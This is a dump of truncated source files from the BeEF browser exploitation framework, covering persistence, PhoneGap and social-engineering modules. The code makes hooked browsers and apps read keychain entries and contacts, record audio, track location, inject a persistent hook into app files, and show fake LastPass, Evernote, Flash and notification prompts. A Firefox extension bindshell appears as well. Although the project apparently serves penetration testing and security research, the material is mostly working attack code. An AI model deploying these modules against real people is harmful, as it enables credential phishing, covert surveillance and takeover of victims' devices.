language stringlengths 0 24 | filename stringlengths 9 214 | code stringlengths 99 9.93M |
|---|---|---|
Ruby | beef/modules/persistence/popunder_window/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Popunder_window < BeEF::Core::Command
def self.options
[{ 'name' => 'clickjack',
'ui_label' => 'Clickjack',
'type'... |
JavaScript | beef/modules/persistence/popunder_window_ie/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var popunder_url = beef.net.httpproto + '://' + beef.net.host + ':' + beef.net.port + '/demos/plain.html';
... |
YAML | beef/modules/persistence/popunder_window_ie/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
popunder_window_ie:
enable: true
category: "Persistence"
name: "Create Pop Und... |
Ruby | beef/modules/persistence/popunder_window_ie/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Popunder_window_ie < BeEF::Core::Command
def post_execute
save({ 'result' => @datastore['result'] })
end
end |
JavaScript | beef/modules/phonegap/phonegap_alert_user/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Phonegap_alert_user
//
beef.execute(function() {
var title = "<%== @title %>";
var message = "<%== @message %>";
var bu... |
YAML | beef/modules/phonegap/phonegap_alert_user/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_prompt_user
#
beef:
module:
phonegap_alert_user:
enable: true
category: "Phonegap"
... |
Ruby | beef/modules/phonegap/phonegap_alert_user/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_prompt_user
#
class Phonegap_alert_user < BeEF::Core::Command
def self.options
[{
'name' => 'title',
'descript... |
JavaScript | beef/modules/phonegap/phonegap_beep/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// make the phone beep
//
beef.execute(function() {
navigator.notification.beep(1);
beef.net.send("<%= @command_url %>", <%= @... |
YAML | beef/modules/phonegap/phonegap_beep/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_beep:
enable: true
category: "Phonegap"
name: "Beep"
... |
Ruby | beef/modules/phonegap/phonegap_beep/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_beep < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
... |
JavaScript | beef/modules/phonegap/phonegap_check_connection/command.js | /*
* Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var connection_type;
getConnectionType = function() {
var states = {};
states[Conn... |
YAML | beef/modules/phonegap/phonegap_check_connection/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_check_connection:
enable: true
category: "Phonegap"
na... |
Ruby | beef/modules/phonegap/phonegap_check_connection/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_check_connection < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['... |
JavaScript | beef/modules/phonegap/phonegap_detect/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// detect phonegap
//
beef.execute(function() {
var phonegap_details;
try {
phonegap_details = ""
+ " name: ... |
YAML | beef/modules/phonegap/phonegap_detect/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_detect:
enable: true
category: "Phonegap"
name: "Detec... |
Ruby | beef/modules/phonegap/phonegap_detect/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_detect < BeEF::Core::Command
def post_execute
content = {}
content['phonegap'] = @datastore['phonegap... |
JavaScript | beef/modules/phonegap/phonegap_file_upload/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// phonegap_upload
//
beef.execute(function() {
var result = 'unchanged';
// TODO return result to beef
function win(... |
YAML | beef/modules/phonegap/phonegap_file_upload/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_file_upload:
enable: true
category: "Phonegap"
name: "... |
Ruby | beef/modules/phonegap/phonegap_file_upload/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_file_upload < BeEF::Core::Command
def self.options
[{
'name' => 'file_upload_dst',
'descripti... |
JavaScript | beef/modules/phonegap/phonegap_geo_locate/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// geo locate
//
beef.execute(function() {
var onSuccess = function(position) {
result =
'Latitude: ' ... |
YAML | beef/modules/phonegap/phonegap_geo_locate/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_geo_locate:
enable: true
category: "Phonegap"
name: "G... |
Ruby | beef/modules/phonegap/phonegap_geo_locate/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_geo_locate < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result... |
JavaScript | beef/modules/phonegap/phonegap_globalization_status/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Phonegap_globalization_status
//
beef.execute(function() {
var result = '';
navigator.globalization.getPreferredLanguage(
... |
YAML | beef/modules/phonegap/phonegap_globalization_status/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_globalization_status
#
beef:
module:
phonegap_globalization_status:
enable: true
category: ... |
Ruby | beef/modules/phonegap/phonegap_globalization_status/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# // Phonegap_globalization_status
class Phonegap_globalization_status < BeEF::Core::Command
def post_execute
content = {}
conten... |
JavaScript | beef/modules/phonegap/phonegap_keychain/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Phonegap_keychain
//
beef.execute(function() {
var servicename = "<%== @servicename %>";
var key = "<%== @key %>";
var ... |
YAML | beef/modules/phonegap/phonegap_keychain/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_keychain
#
beef:
module:
phonegap_keychain:
enable: true
category: "Phonegap"
n... |
Ruby | beef/modules/phonegap/phonegap_keychain/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_keychain
#
class Phonegap_keychain < BeEF::Core::Command
def self.options
[{
'name' => 'servicename',
'descrip... |
JavaScript | beef/modules/phonegap/phonegap_list_contacts/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// phonegap_list_contacts
//
beef.execute(function() {
var result = '';
function onSuccess(contacts) {
for (var i=0... |
YAML | beef/modules/phonegap/phonegap_list_contacts/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_list_contacts:
enable: true
category: "Phonegap"
name:... |
Ruby | beef/modules/phonegap/phonegap_list_contacts/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# // phonegap_list_contacts
class Phonegap_list_contacts < BeEF::Core::Command
def post_execute
content = {}
content['Result'] = ... |
JavaScript | beef/modules/phonegap/phonegap_list_files/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// phonegap_upload
//
beef.execute(function() {
var directory = "<%== @directory %>";
var result = '';
function fail() {
... |
YAML | beef/modules/phonegap/phonegap_list_files/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_list_files:
enable: true
category: "Phonegap"
name: "L... |
Ruby | beef/modules/phonegap/phonegap_list_files/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_list_files < BeEF::Core::Command
def self.options
[{
'name' => 'directory',
'description' => ... |
JavaScript | beef/modules/phonegap/phonegap_persistence/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// persistence
//
beef.execute(function() {
// insert hook into index.html
//
// 1. locate index.html
// 2. read i... |
YAML | beef/modules/phonegap/phonegap_persistence/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap persistence
#
beef:
module:
phonegap_persistence:
enable: true
category: "Phonegap"
... |
Ruby | beef/modules/phonegap/phonegap_persistence/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap persistenece
#
class Phonegap_persistence < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuratio... |
JavaScript | beef/modules/phonegap/phonegap_persist_resume/command.js | /*
* Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
//
// persist on over app's sleep/wake events
beef.execute(function() {
var result;
try {
document.addEventListener(... |
YAML | beef/modules/phonegap/phonegap_persist_resume/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# persist on over app's sleep/wake events
beef:
module:
phonegap_persist_resume:
enable: true
categor... |
Ruby | beef/modules/phonegap/phonegap_persist_resume/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# persist on over app's sleep/wake events
class Phonegap_persist_resume < BeEF::Core::Command
def post_execute
content = {}
con... |
JavaScript | beef/modules/phonegap/phonegap_plugin_detection/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// phonegap_plugin_detection
//
beef.execute(function() {
var result = '';
// Approximate list of plugins, intended to work w... |
YAML | beef/modules/phonegap/phonegap_plugin_detection/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap_plugin_detection
#
beef:
module:
phonegap_plugin_detection:
enable: true
category: "Phonega... |
Ruby | beef/modules/phonegap/phonegap_plugin_detection/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# // phonegap_plugin_detection
class Phonegap_plugin_detection < BeEF::Core::Command
def post_execute
content = {}
content['Resul... |
JavaScript | beef/modules/phonegap/phonegap_prompt_user/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Phonegap_prompt_user
//
beef.execute(function() {
var title = "<%== @title %>";
var question = "<%== @question %>";
var... |
YAML | beef/modules/phonegap/phonegap_prompt_user/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_prompt_user
#
beef:
module:
phonegap_prompt_user:
enable: true
category: "Phonegap"
... |
Ruby | beef/modules/phonegap/phonegap_prompt_user/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# Phonegap_prompt_user
#
class Phonegap_prompt_user < BeEF::Core::Command
def self.options
[{
'name' => 'title',
'descrip... |
JavaScript | beef/modules/phonegap/phonegap_start_record_audio/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// exploit phonegap
//
beef.execute(function() {
// TODO detect iphone/android and set this accordingly
var file_uri = "<%== @... |
YAML | beef/modules/phonegap/phonegap_start_record_audio/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_start_record_audio:
enable: true
category: "Phonegap"
... |
Ruby | beef/modules/phonegap/phonegap_start_record_audio/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_start_record_audio < BeEF::Core::Command
def self.options
[
{ 'name' => 'file_name',
'descr... |
JavaScript | beef/modules/phonegap/phonegap_stop_record_audio/command.js | //
// Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// exploit phonegap
//
beef.execute(function() {
m.stopRecord();
// weirdly setTimeout and stopRecord don't seem to work toget... |
YAML | beef/modules/phonegap/phonegap_stop_record_audio/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
beef:
module:
phonegap_stop_record_audio:
enable: true
category: "Phonegap"
n... |
Ruby | beef/modules/phonegap/phonegap_stop_record_audio/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
# phonegap
#
class Phonegap_stop_record_audio < BeEF::Core::Command
end |
JavaScript | beef/modules/social_engineering/clickjacking/command.js | /*
* Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
* Browser Exploitation Framework (BeEF) - http://beefproject.com
* See the file 'doc/COPYING' for copying permission
*/
beef.execute(function() {
var elems = {
outerFrame: "cjFrame",
innerFrame: "innerFrame",
btn: "persistentFocusBtn"
}
var cli... |
YAML | beef/modules/social_engineering/clickjacking/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
clickjacking:
enable: true
category: "Social Engineering"
name: "Clickjacking... |
Ruby | beef/modules/social_engineering/clickjacking/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Clickjacking < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configurat... |
JavaScript | beef/modules/social_engineering/clippy/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
/**
* Heretic Clippy
* @version 1.0.0
* @author sprky0
* @modified vt & denden
**/
function __clippyb... |
YAML | beef/modules/social_engineering/clippy/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
clippy:
enable: true
category: "Social Engineering"
name: "Clippy"
... |
Ruby | beef/modules/social_engineering/clippy/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Clippy < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/social_engine... |
JavaScript | beef/modules/social_engineering/edge_wscript_wsh_injection/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function(){
var timeout = 5;
if (!beef.browser.isEdge()) {
beef.debug("[Edge WScript WSH Injection] Browser is no... |
YAML | beef/modules/social_engineering/edge_wscript_wsh_injection/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
edge_wscript_wsh_injection:
enable: true
category: ["Social Engineering"]
name: "Edge WScript WSH Inje... |
Ruby | beef/modules/social_engineering/edge_wscript_wsh_injection/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Edge_wscript_wsh_injection < BeEF::Core::Command
def pre_send
payload = ''
@datastore.each do |input|
payload = input[... |
JavaScript | beef/modules/social_engineering/fake_evernote_clipper/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Prepare the onmessage event handling
var eventMethod = window.addEventListener ? "addEventListener" : "... |
YAML | beef/modules/social_engineering/fake_evernote_clipper/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_evernote_clipper:
enable: true
category: "Social Engineering"
name: "Fake... |
beef/modules/social_engineering/fake_evernote_clipper/login.css | body {
font-size: 11px;
font-style: normal;
overflow: hidden;
-webkit-font-smoothing: antialiased;
-webkit-user-select: none;
}
* {
background-repeat: no-repeat;
color: inherit;
font: inherit;
text-shadow: inherit;
-webkit-font-smoothing: inherit;
}
textarea {
resize: none;
}
a {
text-decorat... | |
HTML | beef/modules/social_engineering/fake_evernote_clipper/login.html | <html>
<head>
<link type="text/css" rel="stylesheet" href="login.css"></link>
</head>
<body>
<div id="main">
<div id="logo"></div>
<div id="close" tabindex="8"></div>
<div id="switcher" tabindex="7"></div>
<div id="globalError"></div>
<div class="inputContainer">
<inp... |
Ruby | beef/modules/social_engineering/fake_evernote_clipper/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_evernote_clipper < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/module... |
JavaScript | beef/modules/social_engineering/fake_flash_update/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Module Configurations
var image = "<%== @image %>";
// Function to gray out the screen
var gra... |
YAML | beef/modules/social_engineering/fake_flash_update/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_flash_update:
enable: true
category: "Social Engineering"
name: "Fake Fla... |
Ruby | beef/modules/social_engineering/fake_flash_update/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_flash_update < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/so... |
JavaScript | beef/modules/social_engineering/fake_lastpass/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
// Prepare the onmessage event handling
var eventMethod = window.addEventListener ? "addEventListener" : "... |
YAML | beef/modules/social_engineering/fake_lastpass/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_lastpass:
enable: true
category: "Social Engineering"
name: "Fake LastPas... |
HTML | beef/modules/social_engineering/fake_lastpass/index-new.html | <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
<style type="text/css">
body { font-family: Helvetica,Arial; min-width: 200px; min-height: 200px; }
.... |
HTML | beef/modules/social_engineering/fake_lastpass/index.html | <html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><meta http-equiv="Pragma" CONTENT="no-cache"><meta http-equiv="Expires" CONTENT="0"><meta http-equiv="CACHE-CONTROL" CONTENT="no-cache">
<style type="text/css">
body { font-family: Helvetica,Arial;
color:white;}
#_docwrite_login_small7 { w... |
Ruby | beef/modules/social_engineering/fake_lastpass/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_lastpass < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/core/main/clie... |
JavaScript | beef/modules/social_engineering/fake_notification/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var id = beef.dom.generateID();
var pid = beef.dom.generateID();
var zztop = beef.dom.getHighestZindex()+... |
YAML | beef/modules/social_engineering/fake_notification/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_notification:
enable: true
category: "Social Engineering"
name: "Fake Not... |
Ruby | beef/modules/social_engineering/fake_notification/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_notification < BeEF::Core::Command
def self.options
[
{ 'name' => 'notification_text',
'description' => 'Text... |
JavaScript | beef/modules/social_engineering/fake_notification_c/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var id = beef.dom.generateID();
var pid = beef.dom.generateID();
var zztop = beef.dom.getHighestZindex()+... |
YAML | beef/modules/social_engineering/fake_notification_c/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_notification_c:
enable: true
category: "Social Engineering"
name: "Fake N... |
Ruby | beef/modules/social_engineering/fake_notification_c/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_notification_c < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @conf... |
JavaScript | beef/modules/social_engineering/fake_notification_ff/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var id = beef.dom.generateID();
var pid = beef.dom.generateID();
var zztop = beef.dom.getHighestZindex()+... |
YAML | beef/modules/social_engineering/fake_notification_ff/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_notification_ff:
enable: true
category: "Social Engineering"
name: "Fake ... |
Ruby | beef/modules/social_engineering/fake_notification_ff/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_notification_ff < BeEF::Core::Command
def self.options
[
{ 'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => ''... |
JavaScript | beef/modules/social_engineering/fake_notification_ie/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var id = beef.dom.generateID();
var pid = beef.dom.generateID();
var zztop = beef.dom.getHighestZindex()+... |
YAML | beef/modules/social_engineering/fake_notification_ie/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
fake_notification_ie:
enable: true
category: "Social Engineering"
name: "Fake ... |
Ruby | beef/modules/social_engineering/fake_notification_ie/module.rb | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Fake_notification_ie < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @con... |
JavaScript | beef/modules/social_engineering/firefox_extension_bindshell/command.js | //
// Copyright (c) 2006-2023Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var xpi_name = '<%= @xpi_name %>';
var ff_extension = '/' + xpi_name + '.xpi';
if(beef.browser.... |
YAML | beef/modules/social_engineering/firefox_extension_bindshell/config.yaml | #
# Copyright (c) 2006-2023 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
